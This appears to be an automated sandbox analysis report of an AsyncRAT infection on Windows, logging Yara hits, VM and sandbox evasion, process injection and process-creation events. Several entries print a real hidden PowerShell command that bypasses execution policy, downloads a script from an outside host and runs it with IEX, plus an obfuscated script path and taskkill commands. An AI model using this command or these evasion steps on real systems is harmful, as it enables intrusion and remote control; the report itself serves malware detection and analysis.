Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966491660.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966443638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4165262476.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 7440, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Memory allocated: 2D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1000000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5315	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4566	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3348	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 451	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 7395	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 2357	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416	Thread sleep count: 3348 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672	Thread sleep count: 451 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7284	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7320	Thread sleep count: 7395 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7320	Thread sleep count: 2357 > 30	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 0000000F.00000002.1902397498.0000017EEAD40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000003.00000002.2150967102.000002D0EAC65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgO
Source: aspnet_compiler.exe, 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000003.00000002.2150967102.000002D0EAC65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: aspnet_compiler.exe, 00000015.00000002.4157158039.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi64_7584.amsi.csv, type: OTHER

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 412000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 414000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: A1D008	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HTRFAAYAKOCE.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\UZKDPUUZKDPsUZKDPeUZKDPrUZKDPs\PUZKDPuUZKDPbUZKDPlUZKDPiUZKDPc\JGEBGEOPVP.ps1'.replace('UZKDP','')"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"	Jump to behavior

Language, Device and Operating System Detection

Yara detected Obfuscated Powershell

Source: Yara match

File source: 27#U0646.bat, type: SAMPLE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
